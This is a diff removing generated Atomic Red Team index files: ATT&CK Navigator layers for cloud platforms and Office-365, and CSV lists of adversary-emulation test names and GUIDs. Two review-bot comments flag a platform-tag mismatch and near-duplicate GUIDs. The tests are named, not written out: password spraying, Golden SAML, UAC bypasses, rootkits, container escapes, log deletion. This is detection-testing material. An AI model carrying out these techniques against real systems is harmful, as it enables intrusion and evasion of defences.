Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
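Review bot: T1619 in this Iaas:Azure layer is scored from the comment "AWS S3 Enumeration", which is an AWS test, and the Iaas:AWS layer above does not list T1619 at all. If the layer files are regenerated, the platform filter that assigns tests to the Azure layer is letting an AWS-only test through while the AWS layer misses it, which points at a wrong platform tag on that test rather than at the generator.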
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1,14 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
@@ -1,18 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
@@ -1,5 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
@@ -1,26 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
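Review bot: several test GUIDs in this index are near-duplicates of one another, which suggests hand-edited rather than generated identifiers: `9c10dc6b-20bd-403a-8e67-50ef7d07ed4e` (AWS - CloudTrail Changes) versus `9c10d16b-20b1-403a-8e67-50ef7117ed4e` (AWS - Password Spray an AWS using GoAWSConsoleSpray), and `8822c3b0-d9f9-4daf-a043-491160a31122` (AWS - Create Access Key and Secret Key) versus `8822c3b0-d9f9-4daf-a043-49f110a31122` (AWS - Create a group and add a user to that group). The GUID is the stable key that identifies a test across renames, so the affected tests should get freshly generated GUIDs before the index is rebuilt instead of edited copies of an existing one.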
@@ -1,1646 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
